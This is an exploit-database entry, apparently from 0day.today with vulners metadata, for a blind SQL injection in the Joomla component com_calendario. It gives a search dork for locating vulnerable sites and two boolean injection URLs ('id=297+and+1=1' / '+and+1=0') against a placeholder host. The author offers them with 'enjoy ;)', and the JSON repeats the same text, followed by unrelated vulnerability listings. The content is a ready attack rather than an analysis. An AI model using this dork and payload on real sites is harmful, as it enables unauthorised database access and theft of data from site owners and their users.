ID 1337DAY-ID-10475
Type zdt
Reporter Mr.tro0oqy
Modified 2009-12-28T00:00:00
Description
Exploit for unknown platform in category web applications
=================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================
dork: inurl:index.php?option=com_calendario
exp :
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
enjoy ;)
# 0day.today [2018-04-13] #
{"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:25", "bulletin": {"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.8, "modified": "2016-04-19T04:09:25", "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C/"}}, "hash": "49f143972c0bf66d353a9379fe5bf6aac1c174e0a1ba0267163127f0e2c2bbdd", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T04:09:25", "edition": 1, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "http://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a07def2dc7c1facbdc241666f1853a32", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "795b612fe6caf7ee070c9a65b9733127", "key": "sourceData"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "b830a4e55627eea4a40db0974801f8e7", "key": "sourceHref"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "d01083a754211eb76909852ed4695a790cecc39315285383af6165e2d087124f", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-04-13T01:47:14"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-04-13T01:47:14", "edition": 2, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "https://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2018-04-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ebe37ded7e29bf1602949162b6245d8f", "key": "href"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "ceb3da58fdf0b848784c133dd008f46d", "key": "sourceData"}, {"hash": "82abbafc2b0108bbe9d710dd1a57a9bd", "key": "sourceHref"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "BASES directory contains executable files and has weak security permissions.", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:VULN:10475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10475", "title": "Kaspersky Lab Multiple products privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "NAt feature DoS, sys_get_thread_area() kernel memory content leak, ip_vs_conn_flush() race conditions, Posix timers DoS, rose_rt_ioctl() DoS.", "modified": "2005-12-01T00:00:00", "published": "2005-12-01T00:00:00", "id": "SECURITYVULNS:VULN:5496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5496", "title": "Multiple linux kernels vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2019-04-13T18:54:33", "bulletinFamily": "software", "description": "Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel.\n", "modified": "2009-06-02T00:00:00", "published": "2009-06-02T00:00:00", "href": "https://developer.joomla.org/security-centre/297-20090602-core-frontend-xss.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-297", "type": "joomla", "title": "[20090603] - Core - Frontend XSS", "cvss": {"score": 0.0, "vector": "NONE"}}]}
